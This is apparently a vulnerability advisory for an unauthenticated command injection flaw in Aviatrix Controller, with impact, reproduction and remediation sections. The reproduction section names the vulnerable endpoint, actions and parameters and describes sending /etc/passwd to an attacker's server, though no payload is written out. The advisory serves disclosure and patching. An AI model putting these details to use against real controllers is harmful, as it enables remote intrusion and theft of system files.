Aviatrix Controller Command Injection Vulnerability Allowing Remote Code Execution

A command injection vulnerability has been identified in Aviatrix Controller versions prior to 7.1.4191 and 7.2.4996. The issue arises from improper sanitization of user-controlled input, which allows an unauthenticated attacker to execute arbitrary commands on the server. Exploitation can be achieved by sending shell metacharacters through specific API parameters, bypassing command validation and appending malicious payloads to the executed commands.

Impact

Exploitation of this vulnerability allows unauthenticated users to execute arbitrary commands on the affected Aviatrix Controller instance.

Reproduction

The vulnerability can be reproduced by sending a POST request to the '/v1/api' endpoint with the 'action' parameter set to 'list_flightpath_destination_instances' or 'flightpath_connection_test'. The 'cloud_type' or 'src_cloud_type' parameters can be used to inject malicious payloads, such as commands to be executed on the server. The injected commands can be crafted to, for example, send the contents of sensitive files like '/etc/passwd' to an external server controlled by the attacker.

Remediation

Users are advised to update Aviatrix Controller to version 7.1.4191 or 7.2.4996. After updating, ensure that the Controller IP Access settings are configured to prevent exposure on port 443 to the Internet.